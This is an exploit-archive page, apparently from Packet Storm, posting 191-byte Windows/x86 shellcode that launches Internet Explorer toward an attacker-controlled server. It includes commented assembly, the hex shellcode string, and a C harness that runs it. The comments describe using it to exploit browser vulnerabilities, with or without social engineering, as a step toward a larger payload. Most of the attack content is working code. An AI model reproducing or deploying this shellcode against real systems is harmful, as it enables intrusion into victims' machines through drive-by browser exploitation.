exploit the possibilities

Windows/x86 iexplore.exe Shellcode

Windows/x86 iexplore.exe Shellcode
Posted Jun 28, 2019
Authored by Joseph McDonagh

191 bytes small Windows/x86 start iexplore.exe shellcode.

tags | x86, shellcode
systems | windows
MD5 | 69ef1b6a666d78243c14b5a2319c40bd

Windows/x86 iexplore.exe Shellcode

Change Mirror Download
/*
# Title: start iexplore.exe
# Author: Joseph McDonagh
# Shellcode length 191
# Could be smaller if the app your are exploiting loads msvcrt.
# Purpose: Use the start command to open internet explorer and connect to a malicious web server
# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload.
# This code can exploit browser vulnerabilities without (or with) social engineering.
# Tested on: WinXP SP 2
# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/. This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload.
# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe
#

***** Assembly code follows *****

; The portion loads msvcrt to make the syscall.
; Hardcoded for winxp

xor eax, eax
mov ax, 0x7472
push eax
push dword 0x6376736d
push esp

; LoadLibrary (hardcoded for Windows XP.
; Can find this on a debugger or arwin)
mov ebx, 0x7c801d77
call ebx
mov ebp, eax

xor eax, eax
PUSH eax ; null terminator
push 0x2f30312e ; /10.
push 0x30312e38 ; 01.8
push 0x36312e32 ; 61.2
push 0x39312f2f ; 91//
push 0x3a707474 ; :ptt
push 0x68206578 ; h ex
push 0x652e6572 ; e.er
push 0x6f6c7078 ; olpx
push 0x65692074 ; ei t
push 0x72617473 ; rats

; Below code moves the pointer and executes the system call that runs the command.

mov edi,esp
push edi
mov eax, 0x77c293c7
call eax

xor eax, eax
push eax
mov eax, 0x7c81caa2
call eax
*/

char code[]=

"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x78\x65\x20\x68\x68\x72\x65\x2e\x65\x68\x78\x70\x6c\x6f\x68\x74\x20\x69\x65\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close